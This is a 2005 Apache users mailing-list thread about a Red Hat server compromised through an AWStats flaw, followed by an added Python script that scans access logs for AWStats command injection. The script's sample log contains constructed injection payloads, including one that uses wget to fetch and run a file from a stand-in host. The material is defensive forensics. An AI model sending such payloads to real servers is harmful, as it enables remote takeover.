On 7/14/05, Anderson Miranda <anderson@xxxxxxxxxxxxxxxxxxxx> wrote:
> Kk, here is what I've got so far:
>
> My system seems to be infected by some kind of trojan/worm/virus called
> Unix/Hacktop, which does (from what I'm seeing) some kind of scanport via
> ssh (22).
> I found some related info saying that the intruder could be using a
> security flaw in AWStats + Apache to get a valid root bash session
> over port 80.
>
> Now the intruder has created a few files, infected some others and is using
> this scanport. I stopped the scanport by blocking the output of ssh in
> my iptables and was able to erase some virus-related files.
>
> Now I want to know just 2 things:
>
> First, how can I be sure that it all happened because of the awstats
> security flaw?

No way to be 100% certain, but examining your access log for funny calls
to your awstats cgi would be a good way to start.

> Second, how could I completely remove this Unix/Hacktop from my system
> (Linux RedHat9 k2.4)?

Technically, this is impossible without a clean reinstall. The
hacker/cracker could have replaced anything and everything. He could
have replaced the "rm" binary so that it never deletes files that he
placed there. He could have replaced "ls" so it doesn't show those
files. He could have replaced iptables so that it allows in his IP no
matter what you configure.

But since most hackers aren't that smart, you might have some luck if
you can figure out what rootkit was used and undo the damage. But as
you mentioned, this isn't the best list to find help with that.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
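As an added example (not part of the original thread, and not Joshua's or Anderson's code), here is a small Python checker for the first question: scanning an Apache access log for "funny calls" to the AWStats CGI. The AWStats flaws of that period (CVE-2005-0116 is the best known: an unsanitised `configdir` parameter passed to a shell) were all exploited by putting shell metacharacters into awstats.pl query parameters, so the check below URL-decodes the query string of every request to awstats.pl and flags any that contains a pipe, semicolon, backtick, redirection, NUL or `../`. The log lines are constructed for illustration; the script name `awstats.pl` and the combined log format are assumptions about the reader's setup.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format. They are
# illustrations written for this example, not lines from the original thread.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2005:03:14:07 -0300] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Jul/2005:03:22:51 -0300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;id;echo%20YYY;echo|%00 HTTP/1.0" 200 1270 "-" "-"
192.0.2.44 - - [12/Jul/2005:03:23:10 -0300] "GET /cgi-bin/awstats.pl?configdir=%7Ccd%20/tmp;wget%20http://203.0.113.9/x;sh%20x%7C%00 HTTP/1.0" 200 988 "-" "-"
10.0.0.7 - - [12/Jul/2005:04:01:00 -0300] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
"""

# Common/combined log format: client, ident, user, [timestamp], "request", status, size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that never belong in a legitimate AWStats parameter value but
# are exactly what a command-injection payload needs: pipe, semicolon,
# backtick, $(), redirections, NUL (used to cut off the tail of the
# injected value) and directory traversal.
META_RE = re.compile(r'[|;`$&<>\x00]|\.\./')

def fully_decode(s, rounds=3):
    """URL-decode repeatedly so a double-encoded %257C ('|') is also caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def parse_line(line):
    """Return the interesting fields of one access-log line, or None if it
    does not look like a common/combined log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }

def is_suspicious_awstats_request(path):
    """True if the request targets awstats.pl and its decoded query string
    carries shell metacharacters."""
    script, _, query = path.partition("?")
    if not script.lower().endswith("awstats.pl"):
        return False
    return META_RE.search(fully_decode(query)) is not None

def awstats_findings(log_text):
    """Scan a whole log and return one record per suspicious AWStats call."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_suspicious_awstats_request(rec["path"]):
            rec["decoded_query"] = fully_decode(rec["path"].partition("?")[2])
            findings.append(rec)
    return findings

if __name__ == "__main__":
    # Point this at a copy of the real access_log instead of SAMPLE_LOG.
    for f in awstats_findings(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {f['decoded_query']}")
```

Run it against a copy of the access log taken off the box (on a host where the attacker may have replaced binaries, as Joshua describes, do not trust tools on the host itself, and assume the attacker may also have edited or truncated the logs). A flagged request with a 200 status gives you the source IP, the timestamp of the initial compromise and the exact command string that was run, which is what you need to decide whether the AWStats flaw was the way in.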